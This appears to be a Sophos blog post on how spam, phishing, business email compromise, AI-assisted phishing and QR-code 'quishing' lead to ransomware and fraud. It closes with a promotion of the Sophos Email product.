When people think of cyber threats today, ransomware tends to dominate the conversation. It’s flashy, destructive, and grabs headlines. But ransomware rarely arrives on its own. More often than not, it’s delivered through something deceptively simple: an email.
Spam may seem like an outdated nuisance, but attackers are evolving it into something much more dangerous. Today, spam is just the starting point. The real threats are phishing and business email compromise (BEC), which exploit trust, steal credentials, and cost organizations billions.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reports that 90% of successful cyberattacks start with phishing. And Sophos’ 2025 State of Ransomware report reinforces that email remains a major vector of attack, with 19% of ransomware victims reporting malicious email as the root cause and a further 18% citing phishing, a notable jump from last year’s 11%.
Email-based attacks aren’t relics of the past. They’re active, sophisticated, and increasingly lucrative for attackers.
Spam isn’t dead, it’s evolving
While many assume spam is outdated, today’s attackers are turning it into a precision tool, one that’s harder to detect and easier to scale.
Spam has been around as long as email itself, dating back to the 1990s when some of the first phishing emails were sent to AOL users. But attackers are still constantly refining their tactics.
Sophos X-Ops researchers have observed a surge in business email compromise (BEC) schemes, in which threat actors manipulate employees into transferring funds or revealing sensitive information. In fact, domestic and international dollar losses from BEC scams now exceed $3 billion a year globally.
The Sophos X-Ops Counter Threat Unit observed that phishing was the initial access vector in 43% of emergency incident response engagements last year. Within the X-Ops’ managed detection and response (MDR) investigations, where analysts proactively dig into suspicious activity before it becomes a full-blown crisis, phishing played a role in 65% of cases.
The takeaway is clear: Whether it’s an active breach or early warning, email-based threats remain one of the most common ways attackers gain a foothold. Ignoring them puts organizations at serious risk.
The rise of AI-enhanced phishing
Attackers are leveraging generative AI tools to craft more convincing phishing emails and spam messages. While threat actors haven’t fully mastered AI yet, they’re increasingly experimenting with GPTs and large language models (LLMs) to scale up their phishing campaigns.
Some threat actors are creating their own GPTs to generate phishing emails and malware. As X-Ops reported earlier this year, “Some threat actors…seem increasingly interested in using generative AI for spamming and scamming. We observed a few examples of cybercriminals providing tips and asking for advice on this topic, including using GPTs for creating phishing emails and spam SMS messages.”
The Sophos 2025 Annual Threat Report also highlighted the emergent use of generative AI in phishing emails. These AI-generated attacks are reshaping the threat landscape and putting every inbox at risk.
LLMs can be used to create grammatically correct content in a format that varies from target to target, effectively defeating content filters that identify signatures in spam and phishing emails. This means traditional filters alone aren’t enough; organizations need adaptive protection that evolve as fast as the threats do.
In October 2024, Sophos AI demonstrated that an entire campaign of targeted emails could be created using AI-orchestrated processes that leveraged existing tools and information gathered from targeted individuals’ social media profiles. This demonstration highlights the growing sophistication of phishing attacks and underscores the need for advanced security measures to protect against such threats.
Another popular tactic is QR code phishing (also known as “quishing”), which embeds malicious QR codes in emails to redirect users to phishing sites. Quishing attacks are evolving fast, with polished designs that slip past traditional filters and lure users into opening malicious files or web pages.
Social engineering: The human factor
Spam and phishing don’t rely on technical flaws — they target people. And in fast-paced environments, even the most vigilant employees can be tricked. Awareness and layered protection are critical.
The Sophos X-Ops Counter Threat Unit observed a surge in innovative social engineering attacks throughout 2024, with threat actors increasingly targeting help desk staff and exploiting human trust rather than technical vulnerabilities.
For example, the GOLD HARVEST threat group has used fake human verification prompts targeting employees who searched for streaming content on corporate devices. Victims were asked to complete keyboard sequences to “prove” they were human, but these actions silently triggered malicious PowerShell code to install infostealer malware.
This tactic is a bold example of how attackers exploit curiosity and convenience, bypassing traditional phishing methods and leveraging behavioral manipulation.
Even cybersecurity companies aren’t immune. Sophos itself was recently targeted in a phishing attack, underscoring how pervasive and effective these threats can be. In this case, a senior Sophos employee fell victim to a phishing email and entered their credentials into a fake login page, leading to a multi-factor authentication (MFA) bypass and a threat actor attempting to access our network. Multiple Sophos teams worked together to eliminate this threat and have started new initiatives to improve intelligence gathering and tighten feedback loops.
How Sophos Email protects against phishing, spam, and BEC
Sophos Email doesn’t just keep up with evolving threats — it anticipates them. With AI-powered analytics and seamless integration, it’s built to stop phishing, spam, and BEC before they reach your inbox.
Sophos Email offers:
- Flexible deployment options.
- Intuitive policy controls.
- Advanced threat analytics powered by over 20 AI and ML models.
- Seamless integration with Sophos Central, Microsoft 365, and Google Workspace.
The Sophos platform scans messages for malicious URLs and QR codes, protecting users from phishing, malware, ransomware, and unsafe websites. It’s a robust solution designed to safeguard organizations from the growing threat of BEC and phishing.
Additionally, Sophos now offers the Email Monitoring System (EMS) — a new enhancement for customers who use Microsoft M365 Defender, Google Workspace Security, or any third-party email security services. EMS gives security teams the clarity and control they need, with deep visibility, actionable reporting, and fast, simplified remediation. You can get started with a free trial of Sophos Email today.
Source link
